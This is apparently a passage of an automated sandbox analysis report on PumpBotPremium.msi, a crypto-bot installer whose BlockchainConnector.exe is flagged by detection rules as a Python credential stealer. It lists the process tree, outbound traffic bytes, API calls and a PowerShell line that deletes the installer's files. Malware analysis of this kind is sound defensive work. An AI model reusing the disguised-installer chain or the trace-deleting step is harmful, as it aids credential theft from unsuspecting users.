Oct 30, 2024 22:05:24.362405062 CET	1236	OUT	Data Raw: b9 e1 aa bf b9 e7 77 df 7f f9 dd ff b4 6c 63 68 e2 9a 33 37 bc f3 b3 2b 76 0e 03 c0 d3 9f c1 bf 34 f2 7a bf ec fa a7 c7 55 6e fa ca ea a7 7e 7d 04 18 06 40 c3 8b da e7 6c 73 ff f8 13 00 8c 05 d7 fe e5 a5 61 ec 7e 70 c1 55 5f 5b 33 76 f2 ea 9b 4d Data Ascii: wlch37+v4zUn~}@lsa~pU_[3vM?K7xCc#W^vk\|U6Yx&/`;>igmy_\\|nZnz^T}`]Kz"?Of_~yg.k]
Oct 30, 2024 22:05:24.362536907 CET	2472	OUT	Data Raw: 9c 7a e6 ee 37 7d 7e 04 c0 f9 17 3e 77 d3 3d ff 85 0d f3 81 f3 b1 6d bd 69 e8 49 d8 be fe 86 77 fe f9 4a 06 f0 b4 d5 5f be 68 c3 6b de b2 62 23 01 17 ac be fc 24 3c 78 07 92 df df f8 27 bb 5f ff c2 ff bd 12 c0 2f 5d 71 ed b9 23 f8 c6 08 3f f1 39 Data Ascii: z7}~>w=miIwJ_hkb#$<x'_/]q#?9W6~w?5bp7~+_p8E}wX8v3U{)/z7_\|0;yqQTq<U_m+CQB"4t"(OYu
Oct 30, 2024 22:05:25.772202969 CET	204	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 30 Oct 2024 21:05:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive X-Powered-By: PHP/7.4.33 X-Powered-By: PleskLin

Target ID:	0
Start time:	17:05:04
Start date:	30/10/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\PumpBotPremium.msi"
Imagebase:	0x7ff6f7af0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	17:05:04
Start date:	30/10/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff6f7af0000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	17:05:07
Start date:	30/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\syswow64\MsiExec.exe -Embedding B605B066270C5298BC361F916947E4D1
Imagebase:	0x980000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	17:05:11
Start date:	30/10/2024
Path:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe"
Imagebase:	0x210000
File size:	892'416 bytes
MD5 hash:	6BE93FD0684F69F0FA34E68B750CF23E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	17:05:12
Start date:	30/10/2024
Path:	C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe" /s
Imagebase:	0x7ff664750000
File size:	60'657'664 bytes
MD5 hash:	65A50EBD00840753BA72C425D692E72E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	17:05:13
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	17:05:21
Start date:	30/10/2024
Path:	C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\BlockchainConnector\BlockchainConnector.exe" /s
Imagebase:	0x7ff7a1560000
File size:	41'556'480 bytes
MD5 hash:	E2FCA92943AC7464998DB6DEC39BDDD7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\BlockchainConnector.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 25%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	17:05:22
Start date:	30/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "ver"
Imagebase:	0x7ff689e90000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	17:05:28
Start date:	30/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -NoLogo -ExecutionPolicy RemoteSigned -Command "C:\Windows\SystemTemp\AI_D021.ps1 -paths 'C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\file_deleter.ps1','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe','C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium','C:\Users\user\AppData\Roaming\Coinsw.app' -retry_count 10"
Imagebase:	0xa10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	17:05:28
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	17:05:31
Start date:	30/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Imagebase:	0xa10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	17:05:31
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	17:05:31
Start date:	30/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Imagebase:	0xa10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 2504, Parent PID: 6944

General

Target ID:	17
Start time:	17:05:31
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	17:05:31
Start date:	30/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Imagebase:	0xa10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 6212, Parent PID: 6948

General

Target ID:	19
Start time:	17:05:31
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	17:05:32
Start date:	30/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
Imagebase:	0xa10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7112, Parent PID: 7476

General

Target ID:	21
Start time:	17:05:32
Start date:	30/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	17.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	26

Executed Functions

Function 0021A450 Relevance: 32.5, APIs: 12, Strings: 6, Instructions: 1004threadsleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?,?,?,002BC772,?,?), ref: 0021AD9E
GetCurrentThreadId.KERNEL32 ref: 0021AA40

Part of subcall function 0027B02E: WaitForSingleObjectEx.KERNEL32(00000000,000000FF,00000000,?,00000000,?,0021B04F,?,00000000,00000000,?,?,?,?,00000000,-00000002), ref: 0027B03A
Part of subcall function 0027B02E: GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000,?,0021B04F,?,00000000,00000000,?,?,?,?,00000000,-00000002,?), ref: 0027B053
Part of subcall function 0027B02E: CloseHandle.KERNEL32(00000000,?,00000000,?,0021B04F,?,00000000,00000000,?,?,?,?,00000000,-00000002,?,4938EAB5), ref: 0027B065

Part of subcall function 00238250: InitializeCriticalSection.KERNEL32(002D8AF4,4938EAB5), ref: 0023828C
Part of subcall function 00238250: EnterCriticalSection.KERNEL32(?,4938EAB5), ref: 00238299
Part of subcall function 00238250: WriteFile.KERNEL32(00000000,?,00000000,00240B71,00000000), ref: 002382CB
Part of subcall function 00238250: FlushFileBuffers.KERNEL32(00000000,?,00000000,00240B71,00000000), ref: 002382D4
Part of subcall function 00238250: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,002BDB5C,00000001,?,00000000,00240B71,00000000), ref: 00238356
Part of subcall function 00238250: FlushFileBuffers.KERNEL32(00000000,?,00000000,00240B71,00000000), ref: 0023835F

std::_Throw_Cpp_error.LIBCPMT ref: 0021AE0A
std::_Throw_Cpp_error.LIBCPMT ref: 0021AE11
std::_Throw_Cpp_error.LIBCPMT ref: 0021AE18
std::_Throw_Cpp_error.LIBCPMT ref: 0021AE2E
GetCurrentThreadId.KERNEL32 ref: 0021B02E

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

std::_Throw_Cpp_error.LIBCPMT ref: 0021B13F
std::_Throw_Cpp_error.LIBCPMT ref: 0021B146
std::_Throw_Cpp_error.LIBCPMT ref: 0021B14D
std::_Throw_Cpp_error.LIBCPMT ref: 0021B154

Strings

appx, xrefs: 0021A89E
Launch failed. Error:, xrefs: 0021AC51
msix, xrefs: 0021A6E3
Launching file:, xrefs: 0021A4DE
msixbundle, xrefs: 0021A727
Return code of launched file:, xrefs: 0021AD19

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$File$Thread$BuffersCriticalCurrentFlushSectionWrite$CloseCodeEnterExitHandleHeapInitializeObjectProcessSingleSleepWait
String ID: Launch failed. Error:$Launching file:$Return code of launched file:$appx$msix$msixbundle
API String ID: 257644201-3912327296
Opcode ID: e9d366e9a072c014c73016cfec2160f881b1ba735b54d8c0332cdaddfd82babf
Instruction ID: 5b0c88bbfe7c92dc0bf4871edd2980ad169c93fbbebf13fa1f29c52ade0c22eb
Opcode Fuzzy Hash: e9d366e9a072c014c73016cfec2160f881b1ba735b54d8c0332cdaddfd82babf
Instruction Fuzzy Hash: 7192EF70D11209CFDB20DFA8C845BEDBBF1BF54314F248299E419AB291EB706A95CF91

Function 002591C0 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 269
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryW.KERNEL32(00000010,00000104,?,00000004,00000000,00000000,?), ref: 0025936E
GetForegroundWindow.USER32(?,00000004,00000000,00000000,?), ref: 002593EA
ShellExecuteExW.SHELL32(?), ref: 002593F7
ShellExecuteExW.SHELL32(?), ref: 00259420
GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId), ref: 00259455
GetProcAddress.KERNEL32(00000000), ref: 0025945C
GetProcessId.KERNELBASE(?), ref: 00259465
AllowSetForegroundWindow.USER32(00000000), ref: 00259468

Strings

runas, xrefs: 002593B3
open, xrefs: 002593A8
.bat, xrefs: 002592F6
/C ""%s" %s", xrefs: 00259393
Kernel32.dll, xrefs: 00259450
%s\System32\cmd.exe, xrefs: 0025937B
GetProcessId, xrefs: 0025944B
.cmd, xrefs: 0025932F

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ExecuteForegroundShellWindow$AddressAllowDirectoryHandleModuleProcProcessWindows
String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$GetProcessId$Kernel32.dll$open$runas
API String ID: 2271306907-986041216
Opcode ID: b60fcaa4915f7c893999f93d1ac77b26ceb4df171be4a7e52113142b8b343ae6
Instruction ID: f1da361e711ec284b520b1fa3387e66da40473bed1c3ea3af6607c0b2a3b5f0d
Opcode Fuzzy Hash: b60fcaa4915f7c893999f93d1ac77b26ceb4df171be4a7e52113142b8b343ae6
Instruction Fuzzy Hash: 1AB1AD70A10249DFDB10DFA8C849BAEBBB5EF19315F1481A9E815EB291EB309958CB50

Function 00229E30 Relevance: 23.2, APIs: 10, Strings: 3, Instructions: 461
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0022A950: GetModuleFileNameW.KERNEL32(00000000,?,00000104,4938EAB5,?,002A0216,000000FF), ref: 0022A9A2

FindFirstFileW.KERNELBASE(?,00000000,.ini,00000004,?,?,?,00000000,00000000,?,4938EAB5), ref: 00229FC0
CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0022A03E
SetFilePointer.KERNELBASE(00000000,00000002,?,00000000), ref: 0022A085
ReadFile.KERNELBASE(00000000,?,?,?,00000000,00000078,?), ref: 0022A0C6
CloseHandle.KERNELBASE(00000000), ref: 0022A112
SetCurrentDirectoryW.KERNELBASE(00000000), ref: 0022A293
OpenMutexW.KERNEL32(00100000,00000000,Global\_MSIExecute), ref: 0022A2C1
GetLastError.KERNEL32 ref: 0022A2DB
FindClose.KERNEL32(?), ref: 0022A398

Strings

Global\_MSIExecute, xrefs: 0022A2B5
!, xrefs: 00229FC9, 0022A38C
.ini, xrefs: 00229FAE

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: File$CloseFind$CreateCurrentDirectoryErrorFirstHandleLastModuleMutexNameOpenPointerRead
String ID: !$.ini$Global\_MSIExecute
API String ID: 2608151938-213348481
Opcode ID: 3bfe1aabd62aa0a8649860d510ec29fa435eeae2ea52591c5390685621f69ef4
Instruction ID: ea2bd31cf3b6106fc57fa9950a502c8ac4f0dac99ac3e782c82018c4eb320a81
Opcode Fuzzy Hash: 3bfe1aabd62aa0a8649860d510ec29fa435eeae2ea52591c5390685621f69ef4
Instruction Fuzzy Hash: 7712007091061AEFDB10DFA8D848BEEFBF4BF04314F148259E419A7291DBB49A58CF91

Function 002323D0 Relevance: 16.6, APIs: 11, Instructions: 117
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00232418
OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00232425
GetLastError.KERNEL32 ref: 0023242F
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,002A1895), ref: 00232459
GetLastError.KERNEL32 ref: 0023245F
GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),002A1895,002A1895,002A1895,002A1895), ref: 00232485
AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 002324B8
EqualSid.ADVAPI32(00000000,?), ref: 002324C7
FreeSid.ADVAPI32(?), ref: 002324D6
CloseHandle.KERNELBASE(00000000), ref: 00232510

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Token$ErrorInformationLastProcess$AllocateCloseCurrentEqualFreeHandleInitializeOpen
String ID:
API String ID: 695978879-0
Opcode ID: 408f35b11de50bdc924b2d4c57d2f541706050bf531b1587a0a17dd6c0f91854
Instruction ID: ea46ee02daa564681a6222e7f11a4f167c0a5d53bd2a93985f794feba184f65c
Opcode Fuzzy Hash: 408f35b11de50bdc924b2d4c57d2f541706050bf531b1587a0a17dd6c0f91854
Instruction Fuzzy Hash: B6411AB1D11219EBEF10DFA4DD49BEEBBB8FF08710F544016E511B2290EB799918CBA4

Function 00237530 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 85
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(ComCtl32.dll,4938EAB5,?,00000008,00000008), ref: 0023756E
GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00237591
GetSystemMetrics.USER32(0000000C), ref: 002375CC
GetSystemMetrics.USER32(0000000B), ref: 002375E2
LoadImageW.USER32(?,?,00000001,00000000,00000000,?), ref: 002375F1
FreeLibrary.KERNEL32(00000000), ref: 0023760F

Strings

LoadIconMetric, xrefs: 0023758B
ComCtl32.dll, xrefs: 00237562

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: LibraryLoadMetricsSystem$AddressFreeImageProc
String ID: ComCtl32.dll$LoadIconMetric
API String ID: 1983857168-764666640
Opcode ID: c5b045fa6f5df07d635a79e88650d87b3e34c50d9f6bc5dc335186e36e41f851
Instruction ID: 12d7f60f46fe2a777bb37cc33d3dad18775548e66c0d90525eae2c94d9d59be4
Opcode Fuzzy Hash: c5b045fa6f5df07d635a79e88650d87b3e34c50d9f6bc5dc335186e36e41f851
Instruction Fuzzy Hash: C63184B1A14255ABDF248F95DC48BAFBFF8EB49750F000169F915A3280D7B49901CBA0

Function 0021B3F0 Relevance: 8.2, Strings: 6, Instructions: 714COMMON

Download Yara Rule

Strings

.msi, xrefs: 0021B6AF
"%s" , xrefs: 0021BACE
\\?\, xrefs: 0021B90F, 0021B9AC
msiexec.exe, xrefs: 0021B719
[SystemFolder], xrefs: 0021B6FA
/i , xrefs: 0021BA11

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: FindHeapProcessResource
String ID: /i $"%s" $.msi$[SystemFolder]$\\?\$msiexec.exe
API String ID: 3983090888-222735069
Opcode ID: eb6dd0f428dbda4a300239e5c63dc77ade79767c255d34d24a59cb3d3749a218
Instruction ID: b360afd6388493fc89c5304ea922dd6fd980fc958f2299c6c919628d58ab2599
Opcode Fuzzy Hash: eb6dd0f428dbda4a300239e5c63dc77ade79767c255d34d24a59cb3d3749a218
Instruction Fuzzy Hash: 3152FE31D21259CBEB15DFA8CC54BEDB7F5AF64304F148298E405AB291DB309E95CF90

Function 0022BF60 Relevance: 7.7, APIs: 5, Instructions: 238fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,4938EAB5,?,?,?,?,?,?,?,?,?,002A0846,000000FF), ref: 0022BFD7

Part of subcall function 00233F40: _wcsrchr.LIBVCRUNTIME ref: 00233F79

Part of subcall function 00234610: _wcsrchr.LIBVCRUNTIME ref: 002346D1

FindFirstFileW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,?,002A0846,000000FF), ref: 0022C14F
FindNextFileW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,?,002A0846,000000FF), ref: 0022C187
FindClose.KERNELBASE(?,?,?,?,?,?,?,?,?,?,002A0846,000000FF), ref: 0022C192
PathIsDirectoryW.SHLWAPI(00000000), ref: 0022C1C5

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: FileFind$_wcsrchr$CloseDeleteDirectoryFirstNextPath
String ID:
API String ID: 1628590722-0
Opcode ID: 428ff4413e9d8c23b5c0c588d0325b338e40b068512a0d350f0b3c2c0e8ed719
Instruction ID: dc188846861293763881ec083a26be94e35daa46239de66d700c01bb1dae3b9f
Opcode Fuzzy Hash: 428ff4413e9d8c23b5c0c588d0325b338e40b068512a0d350f0b3c2c0e8ed719
Instruction Fuzzy Hash: EC91CF71910616DBDB14DFB8DC457EEF7B4BF09320F204229E829A7281DB74AA658F90

Function 002416D0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 217fileCOMMON

Download Yara Rule

APIs

Part of subcall function 002419A0: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,00000000), ref: 00241B03
Part of subcall function 002419A0: GetProcAddress.KERNEL32(00000000), ref: 00241B0A

FindFirstFileW.KERNEL32(?,?,?,00000001), ref: 00241802
FindClose.KERNEL32(00000000), ref: 00241830
FindClose.KERNEL32(00000000), ref: 002418B9

Strings

!, xrefs: 00241808, 00241826, 002418AA

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Find$Close$AddressFileFirstHandleModuleProc
String ID: !
API String ID: 3469240197-518105870
Opcode ID: 5ca8a89e439aed4221c80f64e26c81ed552d132c4935452b952d65451f6e3e7a
Instruction ID: df0713131dac76b8af2161d8f0ae8a19d48f1007e32fa9d9893fd4e195ce366c
Opcode Fuzzy Hash: 5ca8a89e439aed4221c80f64e26c81ed552d132c4935452b952d65451f6e3e7a
